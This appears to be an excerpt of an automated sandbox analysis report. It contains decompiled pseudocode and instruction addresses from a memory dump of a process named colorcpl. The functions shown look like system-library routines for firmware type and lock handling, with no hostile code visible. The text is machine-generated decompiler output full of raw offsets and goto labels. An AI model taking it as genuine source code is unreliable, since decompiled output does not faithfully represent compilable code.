                                                                                                0x00000000
                                                                                                0x06ede752
                                                                                                0x00000000
                                                                                                0x06ede752
                                                                                                0x06ede730
                                                                                                0x06ede735
                                                                                                0x06ede73d
                                                                                                0x06ede73f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ede741
                                                                                                0x06ede741
                                                                                                0x00000000
                                                                                                0x06ede741
                                                                                                0x06ede739
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ede73b
                                                                                                0x00000000
                                                                                                0x06ede73b
                                                                                                0x06ede722
                                                                                                0x06ede720
                                                                                                0x06ede6b0
                                                                                                0x06ede618
                                                                                                0x00000000
                                                                                                0x06ede618

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction ID: f7d41816b6dfbed19a4dda8322b026a341a76c614528e9ee2f4694f769fd8bfd
                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                • Instruction Fuzzy Hash: EB91C031604341AFE7A4CE25CC48B6BB7E9BF84714F14992DF9A5CB281E770E906CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E951BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E06E951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x6ef05f0);
				E06E6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E06E953CA(0);
						return E06E6D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E06E5F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E06E33690(1, _t117, 0x6df1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E06E5AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L06E34620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E06E5AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E06E9500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E06E59860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                0x06e951be
                                                                                                0x06e951c3
                                                                                                0x06e951c8
                                                                                                0x06e951cd
                                                                                                0x06e951d0
                                                                                                0x06e951d3
                                                                                                0x06e951d8
                                                                                                0x06e951db
                                                                                                0x06e951de
                                                                                                0x06e951e0
                                                                                                0x06e951e3
                                                                                                0x06e951e6
                                                                                                0x06e951e8
                                                                                                0x06e95342
                                                                                                0x06e95351
                                                                                                0x06e95356
                                                                                                0x06e9535a
                                                                                                0x06e95360
                                                                                                0x06e95363
                                                                                                0x06e95366
                                                                                                0x06e95369
                                                                                                0x06e95369
                                                                                                0x06e9536b
                                                                                                0x06e9536b
                                                                                                0x06e95370
                                                                                                0x06e953a3
                                                                                                0x06e953a4
                                                                                                0x06e953a6
                                                                                                0x06e953ab
                                                                                                0x06e953ab
                                                                                                0x06e953ae
                                                                                                0x06e953ae
                                                                                                0x06e953b5
                                                                                                0x06e953bf
                                                                                                0x06e953bf
                                                                                                0x06e95375
                                                                                                0x06e95396
                                                                                                0x06e953a0
                                                                                                0x06e953a0
                                                                                                0x00000000
                                                                                                0x06e95396
                                                                                                0x06e95377
                                                                                                0x06e95379
                                                                                                0x06e9537f
                                                                                                0x06e9538c
                                                                                                0x06e95390
                                                                                                0x00000000
                                                                                                0x06e95390
                                                                                                0x06e951ee
                                                                                                0x06e951f1
                                                                                                0x06e95301
                                                                                                0x06e95310
                                                                                                0x06e95315
                                                                                                0x06e95318
                                                                                                0x06e9531b
                                                                                                0x06e95320
                                                                                                0x06e9532e
                                                                                                0x06e95331
                                                                                                0x00000000
                                                                                                0x06e95331
                                                                                                0x06e95328
                                                                                                0x06e95329
                                                                                                0x00000000
                                                                                                0x06e95329
                                                                                                0x06e951fa
                                                                                                0x06e95235
                                                                                                0x06e95236
                                                                                                0x06e95239
                                                                                                0x06e9523f
                                                                                                0x06e95240
                                                                                                0x06e95241
                                                                                                0x06e95242
                                                                                                0x06e95246
                                                                                                0x06e95247
                                                                                                0x06e9524e
                                                                                                0x06e95251
                                                                                                0x06e95267
                                                                                                0x06e95269
                                                                                                0x06e9526e
                                                                                                0x06e9527d
                                                                                                0x06e9527e
                                                                                                0x06e95281
                                                                                                0x06e95282
                                                                                                0x06e95287
                                                                                                0x06e95288
                                                                                                0x06e9528a
                                                                                                0x06e9528f
                                                                                                0x06e95294
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e9529a
                                                                                                0x06e9529c
                                                                                                0x06e9529e
                                                                                                0x06e9529e
                                                                                                0x06e952a4
                                                                                                0x06e952b0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e952ba
                                                                                                0x06e952bc
                                                                                                0x06e952bc
                                                                                                0x06e952d4
                                                                                                0x06e952d9
                                                                                                0x06e952dc
                                                                                                0x06e952e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e952e7
                                                                                                0x06e952f4
                                                                                                0x00000000
                                                                                                0x06e952f4
                                                                                                0x06e95270
                                                                                                0x00000000
                                                                                                0x06e95270
                                                                                                0x06e951fc
                                                                                                0x06e951fd
                                                                                                0x06e95202
                                                                                                0x06e95203
                                                                                                0x06e95205
                                                                                                0x06e9520a
                                                                                                0x06e9520f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e9521b
                                                                                                0x06e95226
                                                                                                0x06e9522b
                                                                                                0x06e9521d
                                                                                                0x06e9521d
                                                                                                0x06e95222
                                                                                                0x06e95222
                                                                                                0x06e9522d
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                • Opcode ID: 6770d559b6cfa2646f418f2c0a950b5a5e2f5936edd0266d04ffa94b6f12e6e6
                                                                                                • Instruction ID: 257aad8050789a4876cc807a5edf21e12144c9f77e25700df1acc7ff1057e7ad
                                                                                                • Opcode Fuzzy Hash: 6770d559b6cfa2646f418f2c0a950b5a5e2f5936edd0266d04ffa94b6f12e6e6
                                                                                                • Instruction Fuzzy Hash: 63516AB1E10708AFDFA5DFA8CD54AAEBBB8BF48700F14502DE919EB251D6719900CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E420A0 Relevance: 1.7, Strings: 1, Instructions: 420COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E06E420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x6f08714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E06E42EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E06E42EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E06E158EC(_t240);
									_t221 =  *0x6f05cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x6f05cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E06E54A2C(0x6f06e40, 0x6e54b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E06E37D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x6df5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E06E4F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E06E4F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E06E97016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L06E32400(_t267 + 0x20);
															}
															L06E32400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E06E42397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E06E32280(_t134, 0x6f08608);
									__eflags =  *0x6f06e48 - _t253; // 0xe24140
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E06E2FFB0(_t198, _t241, 0x6f08608);
										__eflags = _t253;
										if(_t253 != 0) {
											L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x6f06e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x6f08608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E06E46B90(_t210,  &_v64);
										_t262 =  *0x6f08608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E06E4E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E06E597C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E06E5006A(0x6f08608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x6f08608);
												E06E5B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x6f06904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x6f06e48; // 0xe24140
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E06E2FFB0(_t198, _t240, 0x6f08608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E06E500C2(0x6f08608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                0x06e420a0
                                                                                                0x06e420a8
                                                                                                0x06e420ad
                                                                                                0x06e420b3
                                                                                                0x06e420b8
                                                                                                0x06e420c2
                                                                                                0x06e420c7
                                                                                                0x06e420cb
                                                                                                0x06e420d2
                                                                                                0x06e42263
                                                                                                0x06e42266
                                                                                                0x06e85836
                                                                                                0x06e85836
                                                                                                0x00000000
                                                                                                0x06e4226c
                                                                                                0x06e4226c
                                                                                                0x06e42270
                                                                                                0x06e42274
                                                                                                0x06e420e2
                                                                                                0x06e420e2
                                                                                                0x06e420e6
                                                                                                0x06e420ee
                                                                                                0x06e857dc
                                                                                                0x06e857de
                                                                                                0x06e857ec
                                                                                                0x06e857ec
                                                                                                0x06e857f1
                                                                                                0x06e857f3
                                                                                                0x06e857f8
                                                                                                0x00000000
                                                                                                0x06e857f8
                                                                                                0x06e857e0
                                                                                                0x06e857e4
                                                                                                0x06e857ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e857ea
                                                                                                0x06e420f4
                                                                                                0x06e420f4
                                                                                                0x06e420f8
                                                                                                0x06e420f8
                                                                                                0x06e420fc
                                                                                                0x06e42100
                                                                                                0x06e42106
                                                                                                0x06e42201
                                                                                                0x06e42206
                                                                                                0x06e4220b
                                                                                                0x06e4220e
                                                                                                0x06e422a9
                                                                                                0x06e422ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e422b2
                                                                                                0x06e422b5
                                                                                                0x06e85801
                                                                                                0x06e85806
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85810
                                                                                                0x06e85815
                                                                                                0x06e85818
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8581e
                                                                                                0x06e422bb
                                                                                                0x06e422bb
                                                                                                0x06e42218
                                                                                                0x06e42218
                                                                                                0x06e4221c
                                                                                                0x06e42220
                                                                                                0x06e42222
                                                                                                0x06e422c2
                                                                                                0x06e422c4
                                                                                                0x06e422dc
                                                                                                0x06e422dc
                                                                                                0x06e422e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e422e7
                                                                                                0x06e422c8
                                                                                                0x06e422cd
                                                                                                0x06e422d3
                                                                                                0x06e422d6
                                                                                                0x06e85823
                                                                                                0x06e85825
                                                                                                0x06e85827
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8582d
                                                                                                0x00000000
                                                                                                0x06e8582d
                                                                                                0x00000000
                                                                                                0x06e42228
                                                                                                0x06e42228
                                                                                                0x00000000
                                                                                                0x06e42228
                                                                                                0x06e42222
                                                                                                0x06e42214
                                                                                                0x06e42214
                                                                                                0x00000000
                                                                                                0x06e42114
                                                                                                0x06e42114
                                                                                                0x06e42114
                                                                                                0x06e4211a
                                                                                                0x06e4211c
                                                                                                0x06e42348
                                                                                                0x06e4234d
                                                                                                0x06e85840
                                                                                                0x06e85845
                                                                                                0x06e85848
                                                                                                0x06e8584e
                                                                                                0x06e8584e
                                                                                                0x06e85848
                                                                                                0x06e42353
                                                                                                0x06e42355
                                                                                                0x06e42388
                                                                                                0x06e42388
                                                                                                0x06e42368
                                                                                                0x06e4236a
                                                                                                0x06e4236c
                                                                                                0x06e4238f
                                                                                                0x00000000
                                                                                                0x06e4236e
                                                                                                0x06e4236e
                                                                                                0x06e4218e
                                                                                                0x06e4218e
                                                                                                0x06e42191
                                                                                                0x06e42195
                                                                                                0x06e85a03
                                                                                                0x06e85a06
                                                                                                0x06e85a0c
                                                                                                0x06e85a0f
                                                                                                0x06e85a11
                                                                                                0x06e85a13
                                                                                                0x06e85a13
                                                                                                0x06e85a19
                                                                                                0x06e85a1f
                                                                                                0x00000000
                                                                                                0x06e4219b
                                                                                                0x06e4219b
                                                                                                0x06e421a0
                                                                                                0x06e42282
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e42284
                                                                                                0x06e421a6
                                                                                                0x06e421a9
                                                                                                0x06e421ac
                                                                                                0x06e421ae
                                                                                                0x06e421b3
                                                                                                0x06e4228b
                                                                                                0x06e42290
                                                                                                0x06e42379
                                                                                                0x06e42296
                                                                                                0x06e42298
                                                                                                0x06e42298
                                                                                                0x06e42290
                                                                                                0x06e421b9
                                                                                                0x06e421be
                                                                                                0x06e422a2
                                                                                                0x06e422a2
                                                                                                0x06e421c4
                                                                                                0x06e421c8
                                                                                                0x06e421cc
                                                                                                0x06e421d0
                                                                                                0x06e421d4
                                                                                                0x06e421de
                                                                                                0x06e421e3
                                                                                                0x06e85a29
                                                                                                0x06e85a2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85a3b
                                                                                                0x00000000
                                                                                                0x06e421e9
                                                                                                0x06e421e9
                                                                                                0x06e421e9
                                                                                                0x06e421ee
                                                                                                0x06e421f1
                                                                                                0x06e85a45
                                                                                                0x06e85a4b
                                                                                                0x06e85a52
                                                                                                0x06e85a58
                                                                                                0x06e85a5d
                                                                                                0x06e85a5f
                                                                                                0x06e85a71
                                                                                                0x06e85a61
                                                                                                0x06e85a6a
                                                                                                0x06e85a6a
                                                                                                0x06e85a76
                                                                                                0x06e85a79
                                                                                                0x06e85a7f
                                                                                                0x06e85a83
                                                                                                0x06e85a85
                                                                                                0x06e85a87
                                                                                                0x06e85a87
                                                                                                0x06e85a8c
                                                                                                0x06e85a91
                                                                                                0x06e85a97
                                                                                                0x06e85a9f
                                                                                                0x06e85aa0
                                                                                                0x06e85aa1
                                                                                                0x06e85aa6
                                                                                                0x06e85aab
                                                                                                0x06e85ab1
                                                                                                0x06e85ab3
                                                                                                0x06e85ab9
                                                                                                0x06e85aca
